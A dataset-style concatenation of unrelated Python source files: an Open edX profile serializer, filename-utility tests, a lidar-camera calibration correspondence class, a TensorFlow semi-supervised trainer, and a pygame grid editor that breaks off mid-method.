def transform_bio(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_phone_number(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
@staticmethod
def convert_empty_to_None(value):
"""
Helper method to convert empty string to None (other values pass through).
"""
return None if value == "" else value
@staticmethod
def get_profile_image(user_profile, user, request=None):
"""
Returns metadata about a user's profile image.
"""
data = {'has_image': user_profile.has_profile_image}
urls = get_profile_image_urls_for_user(user, request)
data.update({
f'{PROFILE_IMAGE_KEY_PREFIX}_{size_display_name}': url
for size_display_name, url in urls.items()
})
return data
def get_requires_parental_consent(self, user_profile):
"""
Returns a boolean representing whether the user requires parental controls.
"""
return user_profile.requires_parental_consent()
def _get_profile_image(self, user_profile):
"""
Returns metadata about a user's profile image
This protected method delegates to the static 'get_profile_image' method
because 'serializers.SerializerMethodField("_get_profile_image")' will
call the method with a single argument, the user_profile object.
"""
return AccountLegacyProfileSerializer.get_profile_image(user_profile, user_profile.user)
def _update_social_links(self, instance, requested_social_links):
"""
Update the given profile instance's social links as requested.
"""
try:
new_social_links = []
deleted_social_platforms = []
for requested_link_data in requested_social_links:
requested_platform = requested_link_data['platform']
requested_link_url = requested_link_data['social_link']
validate_social_link(requested_platform, requested_link_url)
formatted_link = format_social_link(requested_platform, requested_link_url)
if not formatted_link:
deleted_social_platforms.append(requested_platform)
else:
new_social_links.append(
SocialLink(user_profile=instance, platform=requested_platform, social_link=formatted_link)
)
platforms_of_new_social_links = [s.platform for s in new_social_links]
current_social_links = list(instance.social_links.all())
unreplaced_social_links = [
social_link for social_link in current_social_links
if social_link.platform not in platforms_of_new_social_links
]
pruned_unreplaced_social_links = [
social_link for social_link in unreplaced_social_links
if social_link.platform not in deleted_social_platforms
]
merged_social_links = new_social_links + pruned_unreplaced_social_links
instance.social_links.all().delete()
instance.social_links.bulk_create(merged_social_links)
except ValueError as err:
# If we have encountered any validation errors, return them to the user.
raise errors.AccountValidationError({
'social_links': {
"developer_message": f"Error when adding new social link: '{str(err)}'",
"user_message": str(err)
}
})
def update(self, instance, validated_data):
"""
Update the profile, including nested fields.
Raises:
errors.AccountValidationError: the update was not attempted because validation errors were found with
the supplied update
"""
language_proficiencies = validated_data.pop("language_proficiencies", None)
# Update all fields on the user profile that are writeable,
# except for "language_proficiencies" and "social_links", which we'll update separately
update_fields = set(self.get_writeable_fields()) - {"language_proficiencies"} - {"social_links"}
for field_name in update_fields:
default = getattr(instance, field_name)
field_value = validated_data.get(field_name, default)
setattr(instance, field_name, field_value)
# Update the related language proficiency
if language_proficiencies is not None:
instance.language_proficiencies.all().delete()
instance.language_proficiencies.bulk_create([
LanguageProficiency(user_profile=instance, code=language["code"])
for language in language_proficiencies
])
# Update the user's social links
requested_social_links = self._kwargs['data'].get('social_links') # lint-amnesty, pylint: disable=no-member
if requested_social_links:
self._update_social_links(instance, requested_social_links)
instance.save()
return instance
class RetirementUserProfileSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of UserProfile data for use in RetirementStatus APIs
"""
class Meta:
model = UserProfile
fields = ('id', 'name')
class RetirementUserSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of User data for use in RetirementStatus APIs
"""
profile = RetirementUserProfileSerializer(read_only=True)
class Meta:
model = User
fields = ('id', 'username', 'email', 'profile')
class RetirementStateSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of RetirementState data for use in RetirementStatus APIs
"""
class Meta:
model = RetirementState
fields = ('id', 'state_name', 'state_execution_order')
class UserRetirementStatusSerializer(serializers.ModelSerializer):
"""
Perform serialization for the RetirementStatus model
"""
user = RetirementUserSerializer(read_only=True)
current_state = RetirementStateSerializer(read_only=True)
last_state = RetirementStateSerializer(read_only=True)
class Meta:
model = UserRetirementStatus
exclude = ['responses', ]
class UserSearchEmailSerializer(serializers.ModelSerializer):
"""
Perform serialization for the User model used in accounts/search_emails endpoint.
"""
class Meta:
model = User
fields = ('email', 'id', 'username')
class UserRetirementPartnerReportSerializer(serializers.Serializer):
"""
Perform serialization for the UserRetirementPartnerReportingStatus model
"""
user_id = serializers.IntegerField()
student_id = serializers.CharField(required=False)
original_username = serializers.CharField()
original_email = serializers.EmailField()
original_name = serializers.CharField()
orgs = serializers.ListField(child=serializers.CharField())
orgs_config = serializers.ListField(required=False)
created = serializers.DateTimeField()
# Required overrides of abstract base class methods, but we don't use them
def create(self, validated_data):
pass
def update(self, instance, validated_data):
pass
class PendingNameChangeSerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Serialize the PendingNameChange model
"""
new_name = serializers.CharField()
class Meta:
model = PendingNameChange
fields = ('new_name',)
def validate_new_name(self, new_name):
if contains_html(new_name):
raise serializers.ValidationError('Name cannot contain the following characters: < >')
if contains_url(new_name):
raise serializers.ValidationError('Name cannot contain a URL')
def get_extended_profile(user_profile):
"""
Returns the extended user profile fields stored in user_profile.meta
"""
# pick the keys from the site configuration
extended_profile_field_names = configuration_helpers.get_value('extended_profile_fields', [])
try:
extended_profile_fields_data = json.loads(user_profile.meta)
except ValueError:
extended_profile_fields_data = {}
extended_profile = []
for field_name in extended_profile_field_names:
extended_profile.append({
"field_name": field_name,
"field_value": extended_profile_fields_data.get(field_name, "")
})
return extended_profile
def get_profile_visibility(user_profile, user, configuration):
"""
Returns the visibility level for the specified user profile.
"""
if user_profile.requires_parental_consent():
return PRIVATE_VISIBILITY
# Calling UserPreference directly because the requesting user may be different from existing_user
# (and does not have to be is_staff).
profile_privacy = UserPreference.get_value(user, ACCOUNT_VISIBILITY_PREF_KEY)
if profile_privacy:
return profile_privacy
else:
return configuration.get('default_visibility')
def _visible_fields(user_profile, user, configuration=None):
"""
Return what fields should be visible based on user's preferences
:param user_profile: User profile object
:param user: User object
:param configuration: A visibility configuration dictionary.
:return: whitelist List of fields to be shown
"""
if not configuration:
configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
profile_visibility = get_profile_visibility(user_profile, user, configuration)
if profile_visibility == ALL_USERS_VISIBILITY:
return configuration.get('bulk_shareable_fields')
elif profile_visibility == CUSTOM_VISIBILITY:
return _visible_fields_from_custom_preferences(user, configuration)
else:
return configuration.get('public_fields')
def _visible_fields_from_custom_preferences(user, configuration):
"""
Returns all fields that are marked to be shared with other users in the
given user's preferences. Includes fields that are always public.
"""
preferences = UserPreference.get_all_preferences(user)
fields_shared_with_all_users = [
field_name for field_name in configuration.get('custom_shareable_fields')
if preferences.get(f'{VISIBILITY_PREFIX}{field_name}') == 'all_users'
]
return set(fields_shared_with_all_users + configuration.get('public_fields'))
| 845
| 1,265
| 426
|
c05dfe4ef31302a3269efbac97cf25db20c3b395
| 2,399
|
py
|
Python
|
tests/test_utils.py
|
noelhx/organize
|
d3eb2fe9d67e79f2b16b795aa923efcbfb3d9fb3
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
noelhx/organize
|
d3eb2fe9d67e79f2b16b795aa923efcbfb3d9fb3
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
noelhx/organize
|
d3eb2fe9d67e79f2b16b795aa923efcbfb3d9fb3
|
[
"MIT"
] | null | null | null |
from organize.utils import Path, find_unused_filename, splitglob, increment_filename_version
| 34.768116
| 92
| 0.654856
|
from organize.utils import Path, find_unused_filename, splitglob, increment_filename_version
def test_splitglob():
assert splitglob('~/Downloads') == (Path.home() / 'Downloads', '')
assert (
splitglob('/Test/\* tmp\*/*[!H]/**/*.*') ==
(Path('/Test/\* tmp\*'), '*[!H]/**/*.*'))
assert (
splitglob('~/Downloads/Program 0.1*.exe') ==
(Path.home() / 'Downloads', 'Program 0.1*.exe'))
assert (
splitglob('~/Downloads/Program[ms].exe') ==
(Path.home() / 'Downloads', 'Program[ms].exe'))
assert (
splitglob('~/Downloads/Program.exe') ==
(Path.home() / 'Downloads' / 'Program.exe', ''))
def test_unused_filename_basic(mock_exists):
mock_exists.return_value = False
assert find_unused_filename(Path('somefile.jpg')) == Path('somefile 2.jpg')
def test_unused_filename_separator(mock_exists):
mock_exists.return_value = False
assert find_unused_filename(
Path('somefile.jpg'), separator='_') == Path('somefile_2.jpg')
def test_unused_filename_multiple(mock_exists):
mock_exists.side_effect = [True, True, False]
assert find_unused_filename(Path('somefile.jpg')) == Path('somefile 4.jpg')
def test_unused_filename_increase(mock_exists):
mock_exists.side_effect = [True, False]
assert find_unused_filename(
Path('somefile 7.jpg')) == Path('somefile 9.jpg')
def test_unused_filename_increase_digit(mock_exists):
mock_exists.side_effect = [True, False]
assert find_unused_filename(
Path('7.gif')) == Path('7 3.gif')
def test_increment_filename_version():
assert (
increment_filename_version(Path.home() / 'f3' / 'test_123.7z') ==
Path.home() / 'f3' / 'test_123 2.7z')
assert (
increment_filename_version(Path.home() / 'f3' / 'test_123_2 10.7z') ==
Path.home() / 'f3' / 'test_123_2 11.7z')
def test_increment_filename_version_separator():
assert increment_filename_version(
Path('test_123.7z'), separator='_') == Path('test_124.7z')
assert increment_filename_version(
Path('test_123_2.7z'), separator='_') == Path('test_123_3.7z')
def test_increment_filename_version_no_separator():
assert increment_filename_version(
Path('test.7z'), separator='') == Path('test2.7z')
assert increment_filename_version(
Path('test 10.7z'), separator='') == Path('test 102.7z')
| 2,090
| 0
| 207
|
f8fca3440139ea2fefeb145c13dad62f93de1cce
| 4,767
|
py
|
Python
|
calibration_tool/correspondence/correspondence.py
|
liwen-deepmotion/map_based_lidar_camera_calibration_tool
|
d260380729b05b153c2efd1e76d4ae077c48c4b1
|
[
"MIT"
] | 26
|
2021-04-24T08:07:20.000Z
|
2022-03-13T15:21:02.000Z
|
calibration_tool/correspondence/correspondence.py
|
Grandzxw/map_based_lidar_camera_calibration_tool
|
d260380729b05b153c2efd1e76d4ae077c48c4b1
|
[
"MIT"
] | null | null | null |
calibration_tool/correspondence/correspondence.py
|
Grandzxw/map_based_lidar_camera_calibration_tool
|
d260380729b05b153c2efd1e76d4ae077c48c4b1
|
[
"MIT"
] | 9
|
2021-04-19T23:32:21.000Z
|
2022-03-03T06:31:19.000Z
|
from typing import Dict
import numpy as np
from actor.correspondence_actor import CorrespondenceActor
from shape.point_2d import Point2D
from shape.polyline_2d import Polyline2D
from shape.shape import Shape
| 34.294964
| 128
| 0.623872
|
from typing import Dict
import numpy as np
from actor.correspondence_actor import CorrespondenceActor
from shape.point_2d import Point2D
from shape.polyline_2d import Polyline2D
from shape.shape import Shape
class Correspondence(object):
def __init__(self, shape: Shape = None,
reprojected_shape: Shape = None,
correspondence_id: int = 0):
self._shape = shape
self._reprojected_shape = reprojected_shape
self._timestamp = int()
self._is_on_road = True
self._actor = CorrespondenceActor()
# This id is used in calibration_optimizer to index the
# according correspondences.
self._id = correspondence_id
def from_json_dict(self, json_dict: Dict):
# FIXME: fix the point correspondence loading bug.
if "annotation_segment" in json_dict:
shape_coords = json_dict['annotation_segment']
vector_coords = json_dict['hd_map_segment']
reprojected_coords = np.zeros(np.array(shape_coords).shape)
self._shape = Polyline2D(
np.array(shape_coords).reshape(-1, 2))
self._reprojected_shape = Polyline2D(
np.array(reprojected_coords).reshape((-1, 2)))
self._reprojected_shape.set_origin_vertices(
np.array(vector_coords).reshape((-1, 3)))
else:
shape_coords = json_dict['annotation_point']
vector_coords = json_dict['hd_map_point']
reprojected_coords = np.zeros(np.array(shape_coords).shape)
self._shape = Point2D(
np.array(shape_coords).reshape(-1, 2))
self._reprojected_shape = Point2D(
np.array(reprojected_coords).reshape((-1, 2)))
self._reprojected_shape.set_origin_vertices(
np.array(vector_coords).reshape((-1, 3)))
self._id = int(json_dict["id"])
self._is_on_road = json_dict['is_on_road']
def to_json_dict(self) -> Dict:
# TODO: Maybe inherit to remove the judgements.
if self.is_line_correspondence():
shape_coords = self._shape.coords().tolist()
vector_coords = self._reprojected_shape.origin_vertices().tolist()
shape_key = "annotation_segment"
vector_key = "hd_map_segment"
else:
shape_coords = self._shape.coords()[0].tolist()
vector_coords = self._reprojected_shape.origin_vertices()[0].tolist()
shape_key = "annotation_point"
vector_key = "hd_map_point"
json_dict = {
shape_key: shape_coords,
vector_key: vector_coords,
'id': self._id,
'is_on_road': self.is_on_road(),
}
return json_dict
def is_valid(self):
return self._shape is not None and \
self._reprojected_shape is not None and \
self._shape.size() == self._reprojected_shape.size()
def is_line_correspondence(self):
return self._shape.size() == 2
def shape(self) -> Shape:
return self._shape
def reprojected_shape(self) -> Shape:
return self._reprojected_shape
def timestamp(self) -> int:
return self._timestamp
def is_on_road(self) -> bool:
return self._is_on_road
def set_id(self, id_: int):
self._id = id_
def id(self) -> int:
return self._id
def set_shape(self, shape: Shape):
self._shape = shape
def set_reprojected_shape(self, shape: Shape):
self._reprojected_shape = shape
def set_timestamp(self, timestamp: int):
self._timestamp = timestamp
def set_is_on_road(self, is_on_road: bool):
self._is_on_road = is_on_road
def actor(self) -> CorrespondenceActor:
return self._actor
def build_actor(self):
self._actor.geometry().set_image_coords(self._shape.coords())
self._actor.set_correspondence_coords(
self._reprojected_shape.coords())
if self._is_on_road:
# blue = (0, 191, 255)
blue = (220, 20, 60)
self._actor.property().set_color(*blue)
self._actor.set_point_color(blue)
else:
pink = (220, 20, 60)
self._actor.property().set_color(*pink)
self._actor.set_point_color(pink)
self._actor.set_correspondence_color((255, 255, 0))
self._actor.property().set_line_width(5)
return self._actor
def __str__(self):
return 'Correspondence: shape_coords: {}, vector_coords: {}, vector_vertices:{}, timestamp: {}'.format(
self._shape.coords(), self._reprojected_shape.coords(), self._reprojected_shape.origin_vertices(), self.timestamp())
| 4,040
| 8
| 509
|
c14b091cf5862855f63fbbe263409ba8262d2632
| 12,598
|
py
|
Python
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 61
|
2019-06-06T19:22:14.000Z
|
2022-03-24T01:38:59.000Z
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 3
|
2019-07-22T14:24:55.000Z
|
2020-09-30T09:15:34.000Z
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 10
|
2019-06-06T18:41:27.000Z
|
2022-03-24T01:39:13.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018, Konstantinos Kamnitsas
#
# This program is free software; you can redistribute and/or modify
# it under the terms of the Apache License, Version 2.0. See the
# accompanying LICENSE file or read the terms at:
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import absolute_import, division, print_function
import logging
LOG = logging.getLogger('main')
import tensorflow as tf
from cclp.routines.schedules.schedules import apply_growth
from cclp.neuralnet.trainers import losses
# A class separate than the model, to keep separately the optimization state.
| 54.301724
| 230
| 0.656057
|
#!/usr/bin/env python
# Copyright (c) 2018, Konstantinos Kamnitsas
#
# This program is free software; you can redistribute and/or modify
# it under the terms of the Apache License, Version 2.0. See the
# accompanying LICENSE file or read the terms at:
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import absolute_import, division, print_function
import logging
LOG = logging.getLogger('main')
import tensorflow as tf
from cclp.routines.schedules.schedules import apply_growth
from cclp.neuralnet.trainers import losses
class Trainer(object):
# A class separate than the model, to keep separately the optimization state.
def __init__(self, params, net_model, t_sup_labels):
self._params = params # A dictionary or dictionary-like ConfigFlags.
self._ema = tf.train.ExponentialMovingAverage(decay=0.99)
self._loss_total_weighted = self._setup_losses( net_model, t_sup_labels )
self._t_learning_rate = self._get_t_learning_rate( net_model ) # Can be returning scalar or tensor (eg from schedule).
self._train_op = self._create_train_op()
self._increase_model_step_op = tf.assign( net_model.get_t_step(), net_model.get_t_step() + 1)
tf.summary.scalar( 'Loss_Total_weighted', self._loss_total_weighted )
tf.summary.scalar( 'Learning_Rate', self._t_learning_rate )
def _setup_losses(self, net_model, t_sup_labels):
# net_model: Instance of ./cclp/neuralnet/models/classifier/Classifier.
losses.add_softmax_cross_entr( logits = net_model.tensor_families["train_sup"]["logits_tens"],
lbls = t_sup_labels,
weight = self._params["logit_weight"] )
if self._params["cc_loss_on"]:
losses.add_cclp_loss(
Z_l = net_model.tensor_families["train_sup"]["emb_z_tens"],
Z_u = net_model.tensor_families["train_unsup"]["emb_z_tens"],
y_l_lbls = t_sup_labels,
c_classes = net_model.get_num_classes(),
# Params for creating the graph
sim_metric = self._params["cc_sim_metric"],
l2_sigmas = self._params["cc_l2_sigmas_init"],
l2_sigmas_trainable = self._params["cc_l2_sigmas_trainable"],
# Params for CCLP loss
cclp_weight = self._params["cc_weight"],
cclp_steps = self._params["cc_steps"],
sum_over_chains = self._params["cc_sum_over_chains"],
# Others
e_smooth = self._params["cc_e_smooth"],
optim_smooth_mtx = self._params["cc_optim_smooth_mtx"] )
loss_total_weighted = tf.losses.get_total_loss(add_regularization_losses=True) # tf keeps track of everything. Losses registered eg in add_logit_loss and L2 are here.
return loss_total_weighted
def _get_t_learning_rate(self, net_model):
# Set up learning rate
if self._params["lr_sched_type"] == 'expon_decay':
t_learning_rate = tf.maximum( tf.train.exponential_decay( self._params["lr_expon_init"], net_model.get_t_step(), self._params["lr_expon_decay_steps"], self._params["lr_expon_decay_factor"], staircase=True),
self._params["lr_min_value"])
elif self._params["lr_sched_type"] == 'piecewise':
# In github it was said that piecewise was used for svhn.
t_learning_rate = tf.maximum( tf.train.piecewise_constant( net_model.get_t_step(), boundaries = [ tf.cast(v, tf.int32) for v in self._params["lr_piecewise_boundaries"] ], values = self._params["lr_piecewise_values"] ),
self._params["lr_min_value"])
return t_learning_rate
def _get_grads_after_calc_grads_and_g_to_v_per_loss(self, list_of_trainable_vars):
# Get all losses
list_of_all_added_losses = tf.losses.get_losses() # THIS DOES NOT INCLUDE REGULARIZATION LOSSES!
# ... See last line: https://github.com/tensorflow/tensorflow/blob/r1.5/tensorflow/python/ops/losses/util.py
list_of_all_added_losses += tf.get_collection( tf.GraphKeys.REGULARIZATION_LOSSES ) # This is where L2 is placed.
LOG.debug("list_of_all_added_losses = " + str(list_of_all_added_losses) )
LOG.debug("tf.get_collection( tf.GraphKeys.REGULARIZATION_LOSSES ) = " + str(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)) )
list_of_grads_for_each_var_per_loss = [] # will be of shape NumLosses x numVars
for loss in list_of_all_added_losses:
LOG.info('Computing grads of each var wrt Loss: '+loss.name )
grads_for_this_loss = tf.gradients( loss, list_of_trainable_vars )
list_of_grads_for_each_var_per_loss.append( grads_for_this_loss )
# Now that you have for each variable, the gradients from the different losses separately, compute the ratios to the variable's value, and an ema to report.
list_of_loss_names_to_print_ratios = ['loss_logit_weighted', 'loss_LP_unl_entr_weighted', 'loss_hop0_weighted',
'loss_hop1_weighted', 'loss_hop2_weighted', 'loss_hop3_weighted', 'loss_hop4_weighted', 'loss_hop5_weighted',
'loss_hopNeg0_weighted' ]
list_of_ema_update_ops = []
for loss_i in range( len(list_of_all_added_losses) ) :
this_loss_name = list_of_all_added_losses[loss_i].name
if any( [ this_loss_name.startswith( name_of_interest ) for name_of_interest in list_of_loss_names_to_print_ratios ] ):
LOG.debug('LOSS FOUND! this_loss_name='+this_loss_name)
grads_for_this_loss = list_of_grads_for_each_var_per_loss[loss_i]
sum_of_all_pow2_grads = 0
sum_of_all_pow2_vars = 0
for grad, var in zip( grads_for_this_loss, list_of_trainable_vars ):
# Each "grad" is of different shape. eg a tensor of shape [3,3,32,32] for conv, or [3] for bias, etc. So I need to treat them carefully.
# Same for Variables tensors.
if grad is None:
continue # eg in the case that a var does not depend on a loss. eg classif layer to auxiliary losses.
sum_of_all_pow2_grads += tf.reduce_sum( tf.pow(grad, 2) )
sum_of_all_pow2_vars += tf.reduce_sum( tf.pow(var, 2) )
norm_grads = tf.sqrt( sum_of_all_pow2_grads )
norm_vars = tf.sqrt( sum_of_all_pow2_vars )
ratio_g_to_v = norm_grads / norm_vars
# Maintain and report a moving average for each ratio:
list_of_ema_update_ops.append( self._ema.apply([ratio_g_to_v]) )
ema_ratio_g_to_v = self._ema.average( ratio_g_to_v )
tf.summary.scalar('RatioGtoV_'+this_loss_name, ema_ratio_g_to_v)
# Add up the gradients from each different loss into one total gradient for each variable, that the optimizer will then apply
grads_total_for_each_var = None
for grads_wrt_specific_loss in list_of_grads_for_each_var_per_loss:
if grads_total_for_each_var is None:
grads_total_for_each_var = grads_wrt_specific_loss
else:
assert len(grads_total_for_each_var) == len(grads_wrt_specific_loss)
num_var_n_grad_tensors = len(grads_total_for_each_var)
for grad_i in range( num_var_n_grad_tensors ):
if grads_wrt_specific_loss[grad_i] is None:
continue # eg if a loss does not depend on a variable. Eg, LP losses wrt classification layer.
elif grads_total_for_each_var[grad_i] is None: # eg if the corresponding variable was independent of the very first loss.
grads_total_for_each_var[grad_i] = grads_wrt_specific_loss[grad_i]
else:
grads_total_for_each_var[grad_i] = grads_total_for_each_var[grad_i] + grads_wrt_specific_loss[grad_i]
return grads_total_for_each_var, list_of_ema_update_ops
def _create_train_op(self):
list_of_optimizers = []
list_of_trainable_var_collections = []
list_of_train_ops = []
"""
LOG.debug("***** Are we correctly getting update ops of BN? *****" )
LOG.debug("tf.get_collection(tf.GraphKeys.UPDATE_OPS)=" + str( tf.get_collection(tf.GraphKeys.UPDATE_OPS) ) )
LOG.debug("len( tf.get_collection(tf.GraphKeys.UPDATE_OPS) ) = " + str( len(tf.get_collection(tf.GraphKeys.UPDATE_OPS)) ) )
for thing in tf.get_collection(tf.GraphKeys.UPDATE_OPS):
LOG.debug( "thing = " + str(thing) )
"""
# Make main op, training all the tf.GraphKeys.TRAINABLE_VARIABLES. All separately trained are in different collections.
trainable_vars_main = tf.get_collection( tf.GraphKeys.TRAINABLE_VARIABLES )
list_of_trainable_var_collections.append( trainable_vars_main ) # concatente all trainable vars in a list/collection.
optimizer_main = tf.train.AdamOptimizer( self._t_learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-07 )
#optimizer_main = tf.train.RMSPropOptimizer( self._t_learning_rate, decay=0.9, momentum=0.6, epsilon=1e-8 )
#optimizer_main = tf.train.MomentumOptimizer( self._t_learning_rate, momentum=0.9, use_nesterov=True )
list_of_optimizers.append( optimizer_main )
if self._params["cc_loss_on"] and self._params["cc_sim_metric"] == "L2" and self._params['cc_l2_sigmas_trainable']:
trainable_lp_l2_sigmas = tf.get_collection( 'TRAINABLE_LP_L2_SIGMAS' )
list_of_trainable_var_collections.append( trainable_lp_l2_sigmas )
optimizer_sigmas = tf.train.AdamOptimizer( self._t_learning_rate * self._params['cc_l2_sigmas_lr_multipl'] )
list_of_optimizers.append( optimizer_sigmas )
# Add more "special" trainable var collections here if needed...
# Get all trainable vars in one list
list_of_trainable_vars = [ var for sublist in list_of_trainable_var_collections for var in sublist ]
if self._params["track_ratio_g_v"] :
LOG.debug("Going to calculate grads per loss separately, to track ratio of grads/var. Slow." )
# grads_total_for_each_var: total gradient for each variable. shape: number of variables.
# list_of_ema_update_ops: one for each tracked loss in list_of_loss_names_to_print_ratios
grads_total_for_each_var, list_of_ema_update_ops = self._get_grads_after_calc_grads_and_g_to_v_per_loss(list_of_trainable_vars)
else :
LOG.debug("Not tracking grads/var. Calc grad from total_loss." )
grads_total_for_each_var = tf.gradients( self._loss_total_weighted, list_of_trainable_vars )
list_of_ema_update_ops = []
# Now lets apply the grads to the parameters, with the appropriate optimiser / learningRate.
low_counter = 0
for i in range( len(list_of_trainable_var_collections) ) :
var_collection = list_of_trainable_var_collections[i]
high_counter = low_counter+len(var_collection)
grads_for_this_var_collection = grads_total_for_each_var[ low_counter: high_counter ]
optimizer = list_of_optimizers[i]
train_op = optimizer.apply_gradients( zip(grads_for_this_var_collection, var_collection) )
list_of_train_ops.append(train_op)
low_counter = high_counter
all_ops_to_run_at_one_train_step = list_of_train_ops
all_ops_to_run_at_one_train_step += list_of_ema_update_ops
all_ops_to_run_at_one_train_step += tf.get_collection(tf.GraphKeys.UPDATE_OPS) # This one keeps updates of Batch normalization.
total_train_op = tf.group( *all_ops_to_run_at_one_train_step )
return total_train_op
def get_train_op(self):
return self._train_op
def get_increase_model_step_op(self):
return self._increase_model_step_op
| 11,708
| 1
| 235
|
2a69b09f93d4e645ddd5130d2759a0551e9cb112
| 9,363
|
py
|
Python
|
PyEvolv/grid_creator/grid_creator.py
|
peerlator/PyEvolv
|
7f5644e2ea22257f34547c9b050bc4cdd4f3bdec
|
[
"MIT"
] | 1
|
2018-08-02T19:42:35.000Z
|
2018-08-02T19:42:35.000Z
|
PyEvolv/grid_creator/grid_creator.py
|
peerlator/PyEvolv
|
7f5644e2ea22257f34547c9b050bc4cdd4f3bdec
|
[
"MIT"
] | 1
|
2018-08-02T19:41:58.000Z
|
2018-08-05T17:53:17.000Z
|
PyEvolv/grid_creator/grid_creator.py
|
peerlator/PyEvolv
|
7f5644e2ea22257f34547c9b050bc4cdd4f3bdec
|
[
"MIT"
] | null | null | null |
import pygame
import numpy as np
import colorsys
from typing import List, Union, Tuple
import os
from PyEvolv.grid_creator.Sidebar import Sidebar
from PyEvolv.assets.font import FONT
| 47.770408
| 281
| 0.610061
|
import pygame
import numpy as np
import colorsys
from typing import List, Union, Tuple
import os
from PyEvolv.grid_creator.Sidebar import Sidebar
from PyEvolv.assets.font import FONT
class GridCreator:
def __init__(self,display_width:int, display_height:int, grid:np.ndarray, grids_path:str, relatives_on_screen:int, y:int=50, sidebar_bg:Tuple[int, int, int]=(255,255,255), sidebar_primary:Tuple[int, int, int]=(0,0,0), sidebar_secondary: Tuple[int, int, int]=(0,0,255)) -> None:
"""The GridCreator class helps with creation of grids for the Game
Arguments:
display_width {int} -- The amount of pixels the window is wide
display_height {int} -- The amount of pixels the window is high
grid {np.array} -- The starting grid
relatives_on_screen {int} -- The amount of relatives displayed on the screen at the beginning
Keyword Arguments:
sidebar_bg {tuple} -- The bg color of the sidebar in RGB (default: {(255,255,255)})
sidebar_primary {tuple} -- The primary color of the sidebar in RGB (default: {(0,0,0)})
sidebar_secondary {tuple} -- The second primary color of the sidebar in RGB (default: {(0,0,255)})
"""
self.display_width = display_width
self.display_height = display_height
self.relative_x = 0
self.relative_y = 0
self.grid = grid
self.grids_path = grids_path
self.relative_x_change = 0
self.relative_y_change = 0
self.relatives_on_screen = relatives_on_screen
self.y = y
self.font = FONT
self.surf = pygame.Surface((display_width,display_height))
pygame.display.set_caption('GridCreator')
self.sidebar_width = display_width-display_height
self.map_surf = pygame.Surface((display_height, display_height))
self.sidebar = Sidebar(self.sidebar_width, self.display_height, self.y, background_color=sidebar_bg, primary_color=sidebar_primary, secondary_color=sidebar_secondary)
self.brush:List[Union[List[float], float]] = [[0, 0, 1], 0, 0] # color hsv, size in tiles, rel_x, rel_y
def next_frame(self) -> None:
"""The next frame. Handles events and displays everything
"""
self.relative_x = min(max(0, self.relative_x + self.relative_x_change), 10*self.grid.shape[0] - self.relatives_on_screen)
self.relative_y = min(max(0, self.relative_y + self.relative_y_change), 10*self.grid.shape[1] - self.relatives_on_screen)
self._sidebar_controller()
self.sidebar.next_frame()
self.map_surf.fill((0,0,0))
self._display_grid(self.map_surf)
self.surf.blit(self.map_surf, (self.sidebar_width, 0))
self.surf.blit(self.sidebar.sidebar_surf, (0, 0))
def controller(self, event:pygame.event) -> None:
self.sidebar.controller(event)
self._grid_controller(event)
self._brush_controller(event)
def _brush_controller(self, event:pygame.event) -> None:
"""The controller for the brush
Arguments:
event {event} -- a single event from pygame.event.get()
"""
color_picker_used = self.sidebar.color_picker
if event.type == pygame.MOUSEBUTTONDOWN:
if self.sidebar_width < event.pos[0] and event.button == 1:
if self.sidebar.color_picker or self.sidebar.fill:
relatives_per_pixel = self.relatives_on_screen / self.display_height
relative_mouse_x = (event.pos[0] - self.sidebar_width) * relatives_per_pixel
relative_mouse_y = (event.pos[1]-self.y) * relatives_per_pixel
tile_x = int(self.relative_x//10 + relative_mouse_x // 10)
tile_y = int(self.relative_y//10 + relative_mouse_y // 10)
if self.sidebar.color_picker:
self.sidebar.color_picker = False
self.brush[0] = self.grid[tile_x, tile_y]
self.sidebar.update_slider(int(self.brush[0][0] * (self.sidebar_width-60)), int(self.brush[0][1] * (self.sidebar_width-60)))
self.grid[tile_x, tile_y] = self.brush[0]
elif self.sidebar.fill:
self._flood_fill(tile_x, tile_y, list(self.grid[tile_x, tile_y]), self.brush[0])
elif event.type == pygame.MOUSEMOTION and event.buttons[0] == 1 and not color_picker_used:
if event.pos[0] - self.sidebar_width > 0:
relatives_per_pixel = self.relatives_on_screen / self.display_height
relative_mouse_x = (event.pos[0] - self.sidebar_width) * relatives_per_pixel
relative_mouse_y = (event.pos[1]-self.y) * relatives_per_pixel
self.brush[1] = int(self.relative_x//10 + relative_mouse_x // 10)
self.brush[2] = int(self.relative_y//10 + relative_mouse_y // 10)
self.grid[self.brush[1], self.brush[2]] = self.brush[0]
def _sidebar_controller(self) -> None:
"""Connection betwenn Sidebar Class and GridCreator Class
"""
self.brush[0][0] = self.sidebar.slider_1_val / (self.sidebar_width-60)
self.brush[0][1] = self.sidebar.slider_1_val / (self.sidebar_width-60)
if self.sidebar.water:
self.brush[0] = [0, 0, 0]
else:
self.brush[0] = [self.sidebar.slider_1_val / (self.sidebar_width-60), self.sidebar.slider_2_val / (self.sidebar_width-60), 1]
if self.sidebar.save:
try:
np.save(self.grids_path + self.sidebar.grid_name + ".npy", self.grid)
self.sidebar.save = False
except:
pass
